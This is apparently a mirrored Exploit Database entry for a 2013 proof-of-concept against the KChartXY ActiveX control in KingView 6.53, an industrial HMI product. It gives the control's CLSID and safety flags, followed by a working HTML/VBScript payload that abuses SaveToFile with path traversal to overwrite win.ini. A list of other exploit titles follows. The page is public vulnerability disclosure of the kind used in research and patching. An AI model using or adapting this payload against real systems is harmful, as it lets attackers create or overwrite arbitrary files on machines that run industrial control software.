KingView 6.53 – ‘KChartXY’ ActiveX File Creation / Overwrite

Exploit Database
35 阅读

作者： blake

日期： 2013-09-04
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/28085/

<!--
KingView ActiveX Control (KChartXY) Remote File Creation / Overwrite
Vendor: http://www.wellintech.com
Version: KingView 6.53 
Tested on: Windows XP SP3 / IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: Blake

CLSID: A9A2011A-1E02-4242-AAE0-B239A6F88BAC
ProgId: KCHARTXYLib.KChartXY
Path: C:\Program Files\KingView\KChartXY.ocx
MemberName: SaveToFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implemented

Description: Proof of concept overwrites the win.ini file
-->
<html>
<object classid='clsid:A9A2011A-1E02-4242-AAE0-B239A6F88BAC' id='target' ></object>
<script language='vbscript'>

arg1="..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini"

target.SaveToFile arg1 

</script>

last Exploits
KingView 6.53 – ‘KChartXY’ ActiveX File Creation / Overwrite的更多信息

Apple macOS/iOS – ‘xpc_data’ Objects Sandbox Escape Privilege Escalation：
Steam Windows Client – Local Privilege Escalation：
Sheed AntiVirus 2.3 – Unquoted Service Path Privilege Escalation：
FuzeZip 1.0.0.131625 – Local Buffer Overflow (SEH)：
Microsoft Xbox One 10.0.14393.2152 – Code Execution (PoC)：
WebkitGTK+ 2.20.3 – ‘ImageBufferCairo::getImageData()’ Buffer Overflow (PoC)：
Microsoft Windows Subsystem for Linux – ‘execve()’ Local Privilege Escalation：
Microsoft Internet Explorer 11 – javascript Code Execution：